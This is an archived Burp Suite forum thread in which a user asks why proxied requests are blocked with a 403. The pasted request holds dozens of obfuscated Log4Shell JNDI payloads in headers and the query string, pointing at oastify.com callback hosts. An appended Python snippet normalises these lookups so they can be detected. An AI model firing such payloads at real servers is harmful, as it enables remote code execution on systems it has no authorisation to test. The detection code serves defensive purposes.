The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


I got a 403 every time I proxy through Burp

godwin-X | Last updated: Feb 28, 2024 01:06AM UTC

Good day buddies, please, I got a 403 every time I proxy through Burp, then checked the request and discovered that some additional poisonous headers are being added, which makes the WAF block the request. Please, any guide on how to fix this issue?

The request + additional headers:

GET /en?hey=5002&action=$%7Bjn$%7Blower:d%7Di:l$%7Blower:d%7Dap://$%7Blower:x%7D$%7Blower:f%7D.twt3wkcvtej9ewbplt990z4o8fe7e42t.oastify.com/a%7D/ HTTP/2
Host: orbs.toolsforhumanity.com
Cookie: _dd_s=
Cache-Control: no-transform
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Microsoft Edge";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.6nugnx38kram5922c60mrcv1zs5k5gt5.oastify.com/a}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
From: root@${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.ezhoz5fgwzmuhheaoecu3k79b0hshn5c.oastify.com/a}
Cf-Connecting_ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.806i0zgaxtnoibf4p8do4e83cuimik69.oastify.com/a}
Forwarded: for=spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.xop7oo4zlibd603tdx1ds3ws0j6b6auz.oastify.com/a};by=spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.xop7oo4zlibd603tdx1ds3ws0j6b6auz.oastify.com/a};host=spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.xop7oo4zlibd603tdx1ds3ws0j6b6auz.oastify.com/a}
X-Host: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.b9ll92pd6wwrreo7ybmrdhh6lxrprpfe.oastify.com/a}
Contact: root@${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.p9zz9gpr6aw5rsolypm5dvhklbr3r4ft.oastify.com/a}
True-Client-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.9pzjp05bmucp7c45e92ptfx41v7n7pve.oastify.com/a}
X-Arbitrary: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.dfwnf4vfcy2txgu94dstjjn8rzxrxulj.oastify.com/a}/
X-Forwarded-Server: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.jf2tfavlc42zxmuf4jszjpner5xxx1lq.oastify.com/a}
X-Client-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.alzkl11civ8q3d06aayqpgt5xw3o3tri.oastify.com/a}
Proxy-Host: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.76bh6ym93stnoal3v7jnade2itolpbd0.oastify.com/a}
Profile: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.im8sm92kj39y4l1ebizyqoudy44w5ntc.oastify.com/a}/wap.xml
Client-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.bwblw2cdtwjreeb7lb9r0h468xepfh36.oastify.com/a}
Via: 1.1 ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.dm3nm42fjy9t4g19bdztqju8yz4r5kt9.oastify.com/a}
X-Real-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.4uzeuva6rphkc790j47kya2z6qcidc11.oastify.com/a}
X-Api-Version: : ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.wnn6nn3ykhac5z2scw0cr2vrzi5a65uu.oastify.com/a}
X-Forwarded-Proto: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.eewoe5ugbz1uwhta3eruikm9q0wsxold.oastify.com/a}/header,
Referer: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.d6kn64mf3yttogl9vdjtaje8izorpodd.oastify.com/a}/ref
X-Forwarded-For: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.v5155mlx2gsbnykruvib91dqhhn9o7cw.oastify.com/a}
X-Originating-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.rup1uiatrch7cu9njr77yx2m6dc5d41t.oastify.com/a}
X-Wap-Profile: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.rwr1wicttcj7eubnlr970x4m8de5f53u.oastify.com/a}/wap.xml
X-Http-Destinationurl: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.bkzlk20dhw7r2ez79bxrohs6wx2p3qrf.oastify.com/a}/
Destination: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.ywy8wpc0tjjee1buly9e044t8kecfe33.oastify.com/a}
Proxy: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.y6586pm03jteo1luvyjea4etikocpfd4.oastify.com/a}
X-Original-Url: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.jk7tka0lh47z2mzf9jxzopsew52x31rq.oastify.com/a}/
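Why a filter in front of the application rejects the request above, as an added example that is not part of the original post and not PortSwigger or WAF vendor code: once the nested `${lower:…}` lookups in the added values are resolved, each one reads as a contiguous `${jndi:ldap://…}` lookup, which is the kind of string a WAF rule can match. The function names, the normalisation approach and the `example.invalid` hosts are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Innermost ${lower:..}/${upper:..} lookup: its argument holds no further "${".
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _apply_case(match):
    kind, text = match.group(1).lower(), match.group(2)
    return text.lower() if kind == "lower" else text.upper()


def resolve_lookups(value, max_rounds=10):
    """Resolve nested case lookups so a split keyword becomes contiguous."""
    for _ in range(max_rounds):  # bounded, so hostile nesting cannot spin forever
        resolved = _CASE_LOOKUP.sub(_apply_case, value)
        if resolved == value:
            break
        value = resolved
    return value


def flag_request(raw):
    """Name the parts of a raw HTTP request that hold a JNDI lookup once normalised."""
    lines = raw.strip().splitlines()
    if not lines:
        return []
    hits = []
    # The request target is URL-encoded ($%7B...%7D), so decode it first.
    if _JNDI.search(resolve_lookups(unquote(lines[0]))):
        hits.append("request-line")
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and _JNDI.search(resolve_lookups(value)):
            hits.append(name.strip())
    return hits


# Constructed sample: same payload shape as the post, placeholder hosts (assumption).
SAMPLE = """\
GET /en?action=$%7Bjn$%7Blower:d%7Di:l$%7Blower:d%7Dap://$%7Blower:x%7D.collab.example.invalid/a%7D/ HTTP/2
Host: app.example.invalid
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.collab.example.invalid/a}
Via: 1.1 ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.collab.example.invalid/a}
"""

if __name__ == "__main__":
    print(flag_request(SAMPLE))
```
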

Dominyque, PortSwigger Agent | Last updated: Feb 28, 2024 07:40AM UTC